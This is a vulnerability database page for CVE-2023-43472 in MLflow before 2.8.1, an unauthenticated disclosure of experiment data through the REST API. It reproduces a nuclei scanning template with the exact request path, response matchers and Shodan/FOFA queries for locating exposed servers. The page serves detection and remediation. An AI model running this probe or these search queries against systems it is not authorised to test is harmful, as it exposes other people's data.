Lucene search
K

MLFlow < 2.8.1 - Sensitive Information Disclosure

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

MLFlow < 2.8.1 - Sensitive Information Disclosure. Vulnerability allows remote attacker to obtain sensitive information via crafted request to REST API. Upgrade MLFlow to a patched version

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-43472
5 Dec 202307:15
attackerkb
Circl
CVE-2023-43472
23 Dec 202315:21
circl
CNNVD
MLFlow Security Vulnerability
5 Dec 202300:00
cnnvd
CVE
CVE-2023-43472
5 Dec 202300:00
cve
Cvelist
CVE-2023-43472
5 Dec 202300:00
cvelist
Github Security Blog
Information exposure in MLflow
5 Dec 202309:33
github
NVD
CVE-2023-43472
5 Dec 202307:15
nvd
OSV
BIT-MLFLOW-2023-43472
6 Mar 202410:58
osv
OSV
GHSA-WQXF-447M-6F5F Information exposure in MLflow
5 Dec 202309:33
osv
Prion
Design/Logic Flaw
5 Dec 202307:15
prion
Rows per page
id: CVE-2023-43472

info:
  name: MLFlow < 2.8.1 - Sensitive Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.
  impact: |
    An attacker can access sensitive information stored in MLFlow.
  remediation: |
    Upgrade MLFlow to a version that has patched CVE-2023-43472.
  reference:
    - https://www.contrastsecurity.com/security-influencers/discovering-mlflow-framework-zero-day-vulnerability-machine-language-model-security-contrast-security
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43472
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-43472
    epss-score: 0.72771
    epss-percentile: 0.98796
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query: app="MLflow"
  tags: cve,cve2023,mflow,exposure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/2.0/preview/mlflow/experiments/list"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "experiment_id\":", "artifact_location\":", "lifecycle_stage\":")'
          - 'contains(header, "application/json")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402200f59aeb61324bd143c544dfe8274443e512cd698774f405241def2ab3b77106502202655be07d7ae7a55200b1b26d76fd5cca9fa8465a4158f4f5bf123dfb85b6aa8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.17.5
EPSS0.72771
17